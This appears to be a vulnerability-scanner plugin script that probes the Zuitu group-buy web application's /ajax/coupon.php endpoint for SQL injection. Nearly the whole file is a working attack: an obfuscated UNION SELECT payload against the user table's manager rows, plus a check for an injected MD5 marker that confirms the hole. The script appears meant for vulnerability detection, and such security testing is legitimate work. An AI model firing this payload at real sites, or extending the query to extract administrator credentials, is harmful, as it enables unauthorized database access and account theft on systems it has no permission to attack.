#request url = var
#define payload = /ajax/coupon.php?action=consume&secret=8&id=2%27%29/**/AnD/**/1=2/**/UnIoN/**/SeLeCt/**/1,2,0,4,5,6,Md5(1234),8,9,10,11,9999999999,13,14,15,16/**/FrOm/**/user/**/WhErE/**/manager=0x59/**/LiMiT/**/0,1%23
#define bug = 81dc9bdb52d04dc20036dbd8313ed055
#define info = 存在最土团购SQL注入漏洞

function main(args)
{
	res = HttpGet(url.payload,"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0");
	if(StrFindStr(res[0],bug,0)!= "-1")
	{
		print(url.info);
	}
}
